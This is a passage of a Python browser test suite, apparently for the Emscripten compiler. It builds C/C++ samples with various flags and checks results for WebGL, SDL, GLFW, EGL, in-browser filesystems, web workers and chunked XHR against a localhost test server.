test_webgl_parallel_shader_compile(self): self.btest_exit('webgl_parallel_shader_compile.cpp') @requires_graphics_hardware def test_webgl_explicit_uniform_location(self): self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2']) @requires_graphics_hardware def 
test_webgl_sampler_layout_binding(self): self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1']) @requires_graphics_hardware def test_webgl2_ubo_layout_binding(self): self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2']) # Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context. @requires_graphics_hardware def test_preinitialized_webgl_context(self): self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')]) @requires_threads def test_emscripten_get_now(self): for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]: self.btest_exit('emscripten_get_now.cpp', args=args) def test_write_file_in_environment_web(self): self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1']) def test_fflush(self): self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE) def test_file_db(self): secret = str(time.time()) create_file('moar.txt', secret) self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST']) shutil.copyfile('test.html', 'first.html') self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM']) shutil.copyfile('test.html', 'second.html') create_file('moar.txt', 'aliantha') self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it shutil.move('test.html', 'third.html') def test_fs_idbfs_sync(self): for extra in [[], ['-DEXTRA_WORK']]: secret = str(time.time()) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js']) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', 
'-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra) def test_fs_idbfs_sync_force_exit(self): secret = str(time.time()) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js']) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js']) def test_fs_idbfs_fsync(self): # sync from persisted state into memory before main() create_file('pre.js', ''' Module.preRun = function() { addRunDependency('syncfs'); FS.mkdir('/working1'); FS.mount(IDBFS, {}, '/working1'); FS.syncfs(true, function (err) { if (err) throw err; removeRunDependency('syncfs'); }); }; ''') args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY'] secret = str(time.time()) self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js']) self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js']) def test_fs_memfs_fsync(self): args = ['-sASYNCIFY', '-sEXIT_RUNTIME'] secret = str(time.time()) self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"']) def test_fs_workerfs_read(self): secret = 'a' * 10 secret2 = 'b' * 10 create_file('pre.js', ''' var Module = {}; Module.preRun = function() { var blob = new Blob(['%s']); var file = new File(['%s'], 'file.txt'); FS.mkdir('/work'); FS.mount(WORKERFS, { blobs: [{ name: 'blob.txt', data: blob }], files: [file], }, '/work'); }; ''' % (secret, secret2)) self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + 
secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js']) def test_fs_workerfs_package(self): create_file('file1.txt', 'first') ensure_dir('sub') open(Path('sub/file2.txt'), 'w').write('second') self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js']) self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js']) def test_fs_lz4fs_package(self): # generate data ensure_dir('subdir') create_file('file1.txt', '0123456789' * (1024 * 128)) open(Path('subdir/file2.txt'), 'w').write('1234567890' * (1024 * 128)) random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1)) random_data[17] = ord('X') open('file3.txt', 'wb').write(random_data) # compress in emcc, -sLZ4 tells it to tell the file packager print('emcc-normal') self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt']) assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1 assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone print(' emcc-opts') self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2']) # compress in the file packager, on the server. the client receives compressed data and can just use it. 
this is typical usage print('normal') out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4']) open('files.js', 'wb').write(out) self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM']) print(' opts') self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2']) print(' modularize') self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1']) create_file('a.html', ''' <script src="a.out.js"></script> <script> Module() </script> ''') self.run_browser('a.html', '.', '/report_result?2') # load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended print('manual') subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js']) self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM']) print(' opts') self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2']) print(' opts+closure') self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet']) '''# non-lz4 for comparison try: os.mkdir('files') except OSError: pass shutil.copyfile('file1.txt', Path('files/file1.txt')) shutil.copyfile('file2.txt', Path('files/file2.txt')) shutil.copyfile('file3.txt', Path('files/file3.txt')) out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt']) open('files.js', 'wb').write(out) self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])''' def test_separate_metadata_later(self): # see issue #6654 - we need to handle 
separate-metadata both when we run before # the main program, and when we are run later create_file('data.dat', ' ') self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js']) self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM']) def test_idbstore(self): secret = str(time.time()) for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]: self.clear() print(stage) self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"']) def test_idbstore_sync(self): secret = str(time.time()) self.clear() self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY']) def test_idbstore_sync_worker(self): secret = str(time.time()) self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY']) def test_force_exit(self): self.btest_exit('force_exit.c', assert_returncode=10) def test_sdl_pumpevents(self): # key events should be detected using SDL_PumpEvents create_file('pre.js', ''' function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } ''') self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL']) def test_sdl_canvas_size(self): self.btest_exit('sdl_canvas_size.c', args=['-O2', '--minify=0', '--shell-file', test_file('sdl_canvas_size.html'), '-lSDL', '-lGL']) @requires_graphics_hardware def test_sdl_gl_read(self): # SDL, OpenGL, readPixels self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']) self.run_browser('something.html', '.', '/report_result?1') @requires_graphics_hardware def 
test_sdl_gl_mapbuffers(self): self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'], message='You should see a blue triangle.') @requires_graphics_hardware def test_sdl_ogl(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_regal(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_defaultmatrixmode(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_p(self): # Immediate mode with pointers shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1, args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_proc_alias(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['-O2', '-g2', 
'-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL']) @requires_graphics_hardware def test_sdl_fog_simple(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png', args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_negative(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_density(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_exp2(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_linear(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1, args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_glfw(self): self.btest_exit('glfw.c', 
args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL']) self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL']) def test_glfw_minimal(self): self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL']) self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL']) def test_glfw_time(self): self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL']) def _test_egl_base(self, *args): self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args)) @requires_graphics_hardware def test_egl(self): self._test_egl_base() @requires_threads @requires_graphics_hardware def test_egl_with_proxy_to_pthread(self): self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER') def _test_egl_width_height_base(self, *args): self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args)) def test_egl_width_height(self): self._test_egl_width_height_base() @requires_threads def test_egl_width_height_with_proxy_to_pthread(self): self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD') @requires_graphics_hardware def test_egl_createcontext_error(self): self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL']) def test_worker(self): # Test running in a web worker create_file('file.dat', 'data for worker') html_file = open('main.html', 'w') html_file.write(''' <html> <body> Worker Test <script> var worker = new Worker('worker.js'); worker.onmessage = function(event) { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:%s/report_result?' 
+ event.data); xhr.send(); setTimeout(function() { window.close() }, 1000); }; </script> </body> </html> ''' % self.port) html_file.close() for file_data in [1, 0]: cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) print(cmd) self.run_process(cmd) self.assertExists('worker.js') self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':') self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too @no_firefox('keeps sending OPTIONS requests, and eventually errors') def test_chunked_synchronous_xhr(self): main = 'chunked_sync_xhr.html' worker_filename = "download_and_checksum_worker.js" html_file = open(main, 'w') html_file.write(r""" <!doctype html> <html> <head><meta charset="utf-8"><title>Chunked XHR</title></head> <body> Chunked XHR Web Worker Test <script> var worker = new Worker(""" + json.dumps(worker_filename) + r"""); var buffer = []; worker.onmessage = function(event) { if (event.data.channel === "stdout") { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:%s/report_result?' 
+ event.data.line); xhr.send(); setTimeout(function() { window.close() }, 1000); } else { if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); }); if (event.data.line) { console.error(event.data.line); } else { var v = event.data.char; if (v == 10) { var line = buffer.splice(0); console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join('')); } else { buffer.push(v); } } } }; </script> </body> </html> """ % self.port) html_file.close() c_source_filename = "checksummer.c" prejs_filename = "worker_prejs.js" prejs_file = open(prejs_filename, 'w') prejs_file.write(r""" if (typeof(Module) === "undefined") Module = {}; Module["arguments"] = ["/bigfile"]; Module["preInit"] = function() { FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false); }; var doTrace = true; Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); }; Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; }; """) prejs_file.close() # vs. os.path.join(self.get_dir(), filename) # vs. test_file('hello_world_gles.c') self.compile_btest([test_file(c_source_filename), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename, '--pre-js', prejs_filename]) chunkSize = 1024 data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port)) server.start() # block until the server is actually ready for i in range(60): try: urlopen('http://localhost:11111') break except Exception as e: print('(sleep for server)') time.sleep(1) if i == 60: raise e try: self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' 
+ str(checksum)) finally: server.terminate() # Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't # attempt to rmdir() files in use. if WINDOWS: time.sleep(2) @requires_graphics_hardware def test_glgears(self, extra_args=[]): self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3, args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args) @requires_graphics_hardware @requires_threads def test_glgears_pthreads(self, extra_args=[]): # test that a program that doesn't use pthreads still works with with pthreads enabled # (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672) self.test_glgears(['-sUSE_PTHREADS']) @requires_graphics_hardware @parameterized({ '': ([False],), # Enabling FULL_ES3 also enables ES2 automatically 'proxy': ([True],) }) def test_glgears_long(self, proxy): args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] if proxy: args += ['--proxy-to-worker'] self.btest('hello_world_gles.c', expected='0', args=args) @requires_graphics_hardware def test_glgears_animation(self): for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']: print(filename) cmd = [test_file(filename), '-o', 'something.html', '-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut', '--shell-file', test_file('hello_world_gles_shell.html')] if 'full' in filename: cmd += ['-sFULL_ES2=1'] self.compile_btest(cmd) self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true') @requires_graphics_hardware def test_fulles2_sdlproc(self): self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut']) @requires_graphics_hardware def test_glgears_deriv(self): self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2, args=['-DHAVE_BUILTIN_SINCOS', '-lGL', 
'-lglut'], message='You should see animating gears.') assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed' @requires_graphics_hardware def test_glbook(self): self.emcc_args.remove('-Werror') programs = self.get_library('third_party/glbook', [ Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'), Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'), Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'), Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'), Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'), Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'), Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'), ], configure=None) def book_path(*pathelems): return test_file('third_party/glbook', *pathelems) for program in programs: print(program) basename = os.path.basename(program) args = ['-lGL', '-lEGL', '-lX11'] if basename == 'CH10_MultiTexture.o': shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga') shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga') args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga'] elif basename == 'CH13_ParticleSystem.o': shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga') args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage self.btest(program, reference=book_path(basename.replace('.o', '.png')), args=args) @requires_graphics_hardware @parameterized({ 'normal': (['-sFULL_ES2=1'],), # Enabling FULL_ES3 also enables ES2 automatically 'full_es3': (['-sFULL_ES3=1'],) }) def test_gles2_emulation(self, args): print(args) shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga') shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga') 
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga') for source, reference in [ (Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')), # (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL (Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')), # (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL (Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')), (Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')), (Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')), ]: print(source) self.btest(source, reference=reference, args=['-I' + test_file('third_party/glbook/Common'), test_file('third_party/glbook/Common/esUtil.c'), test_file('third_party/glbook/Common/esShader.c'), test_file('third_party/glbook/Common/esShapes.c'), test_file('third_party/glbook/Common/esTransform.c'), '-lGL', '-lEGL', '-lX11', '--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args) @requires_graphics_hardware def test_clientside_vertex_arrays_es3(self): self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2']) def test_emscripten_api(self): self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL']) def 
test_emscripten_api2(self): def setup(): create_file('script1.js', ''' Module._set(456); ''') create_file('file1.txt', 'first') create_file('file2.txt', 'second') setup() self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')) self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM']) # check using file packager to another dir self.clear() setup() ensure_dir('sub') self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')) shutil.copyfile(Path('sub/test.data'), 'test.data') self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM']) def test_emscripten_api_infloop(self): self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7) def test_emscripten_fs_api(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL']) def test_emscripten_fs_api2(self): self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"]) self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"]) @requires_threads def test_emscripten_main_loop(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]: self.btest_exit('emscripten_main_loop.cpp', args=args) @requires_threads def test_emscripten_main_loop_settimeout(self): for args in [ [], # test pthreads + AUTO_JS_LIBRARIES mode as well ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'], ]: self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args) @requires_threads def test_emscripten_main_loop_and_blocker(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args) @requires_threads def 
test_emscripten_main_loop_and_blocker_exit(self): # Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The # app should still stay alive until the loop ends self.btest_exit('emscripten_main_loop_and_blocker.cpp') @requires_threads def test_emscripten_main_loop_setimmediate(self): for args in [[], ['--proxy-to-worker'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args) def test_fs_after_main(self): for args in [[], ['-O1']]: self.btest('fs_after_main.cpp', '0', args=args) def test_sdl_quit(self): self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL']) def test_sdl_resize(self): # FIXME(https://github.com/emscripten-core/emscripten/issues/12978) self.emcc_args.append('-Wno-deprecated-declarations') self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL']) def test_glshaderinfo(self): self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut']) @requires_graphics_hardware def test_glgetattachedshaders(self): self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL']) # Covered by dEQP text suite (we can remove it later if we add coverage for that). 
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
  self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])

@requires_graphics_hardware
def test_sdlglshader(self):
  self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_sdlglshader2(self):
  self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_gl_glteximage(self):
  self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])

@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
  for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER']]:
    self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)

@requires_graphics_hardware
def test_gl_ps(self):
  # pointers and a shader
  shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
  self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)

@requires_graphics_hardware
def test_gl_ps_packed(self):
  # packed data that needs to be strided
  shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
  self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)

@requires_graphics_hardware
def test_gl_ps_strides(self):
  shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
  self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])

@requires_graphics_hardware
def test_gl_ps_worker(self):
  shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
  self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)

@requires_graphics_hardware
def test_gl_renderers(self):
  self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_gl_stride(self):
  self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
